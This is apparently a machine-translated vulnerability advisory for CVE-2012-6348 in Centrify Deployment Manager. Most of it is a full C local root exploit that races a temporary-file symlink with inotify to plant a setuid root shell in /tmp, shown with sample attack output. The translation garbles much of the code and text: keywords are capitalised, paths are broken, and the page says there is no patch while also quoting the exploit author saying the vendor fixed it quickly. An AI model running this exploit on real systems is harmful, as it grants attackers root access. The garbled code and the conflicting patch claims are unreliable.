Centrify Deployment Manager Arbitrary File Overwrite Vulnerability

Release date:
Updated on:

Affected Systems:
Centrinity Deployment Manager 2.1.0.283
Description:
--------------------------------------------------------------------------------
CVE (CAN) ID: CVE-2012-6348
 
Centrify DirectManage Components is a system deployment tool on UNIX/Linux systems.
 
In versions earlier than Centrify Suite 2012.5, Centrify Deployment Manager 2.1.0.283 has a security vulnerability in implementation. This vulnerability allows local users to overwrite arbitrary files by using the symbolic link of adcheckDMoutput temporary files. 2.16.0 the symbolic link attack on the temporary file overwrites any file and then increases the permission.
 
<* Source: inotify & syscall technique
Larry W. Cashdollar (lwc@vapid.dhs.org)

Link: http://web.nvd.nist.gov/view/vuln/detail? VulnId = CVE-2012-6348
Http://seclists.org/fulldisclosure/2012/Dec/59
Http://vapid.dhs.org/exploits/centrify_local_r00t.c
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
/* Local root exploit for Centrify Deployment Manager v2.1.0.283 local root,
Centrify released a fix very quickly-nice vendor response.
 
CVE-2012-6348 12/17/2012
Http://vapid.dhs.org/advisories/centrify_deployment_manager_insecure_tmp2.html
Greetings vladz, Thanks for the inotify & syscall technique.
 
This exploit based on http://vladz.devzero.fr/010_bzexe-vuln.php
 
Run the exploit and wait for administrator to analyze or deploysoftware
To the system.
 
Larry @ h0g :~ /Code/exploit $./cent_root centrify. 2.16.0
[*] Launching attack against "centrify. 2.16.0"
[+] Creating edevil script (/tmp/edevil)
[+] Creating target file (/bin/touch/tmp/centrify. 2.16.0)
[+] Initialize inotify
[+] Waiting for root to launch "centrify. 2.16.0"
[+] Opening root shell (/tmp/sh)
#

Larry W. Cashdollar
@ _ Larry0
*/
 

# Include <stdlib. h>
# Include <stdio. h>
# Include <unistd. h>
# Include <sys/stat. h>
# Include <sys/types. h>
# Include <string. h>
# Include <sys/inotify. h>
# Include <fcntl. h>
# Include <sys/syscall. h>
 
/* Create a small c program to pop us a root shell */
Int create_nasty_shell (char * file ){
Char * s = "#! /Bin/bash \ n"
"Echo 'main () {setuid (0); execve (\"/bin/sh \ ", 0, 0);} '>/tmp/sh. c \ n"
"Cc/tmp/sh. c-o/tmp/sh; chown root: root/tmp/sh \ n"
"Chmod 4755/tmp/sh; \ n ";
 
Int fd = open (file, O_CREAT | O_RDWR, S_IRWXU | S_IRWXG | S_IRWXO );
Write (fd, s, strlen (s ));
Close (fd );
 
Return 0;
}
 

Int main (int argc, char ** argv ){
Int fd, wd;
Char buf [1], * targetpath, * cmd,
* Evilsh = "/tmp/edevil", * trash = "/tmp/trash ";
 
If (argc <2 ){
Printf ("Usage: % s <target file> \ n", argv [0]);
Return 1;
}
 
Printf ("[*] Launching attack against \" % s \ "\ n", argv [1]);
 
Printf ("[+] Creating edevil script (/tmp/edevil) \ n ");
Create_nasty_shell (evilsh );
 
Targetpath = malloc (sizeof (argv [1]) + 6 );
Cmd = malloc (sizeof (char) * 32 );
Sprintf (targetpath, "/tmp/% s", argv [1]);
Sprintf (cmd, "/bin/touch % s", targetpath );
Printf ("[+] Creating target file (% s) \ n", cmd );
System (cmd );
 
Printf ("[+] Initialize inotify \ n ");
Fd = inotify_init ();
Wd = inotify_add_watch (fd, targetpath, IN_ATTRIB );
 
Printf ("[+] Waiting for root to change perms on \" % s \ "\ n", argv [1]);
Syscall (SYS_read, fd, buf, 1 );
Syscall (SYS_rename, targetpath, trash );
Syscall (SYS_rename, evilsh, targetpath );
 
Inotify_rm_watch (fd, wd );
 
Printf ("[+] Opening root shell (/tmp/sh) \ n ");
Sleep (2 );
System ("rm-fr/tmp/trash;/tmp/sh | echo \" [-] Failed .\"");
 
Return 0;
}

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
 
Centrinity
----------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
 
Http://www.centrify.com/directmanage/components.asp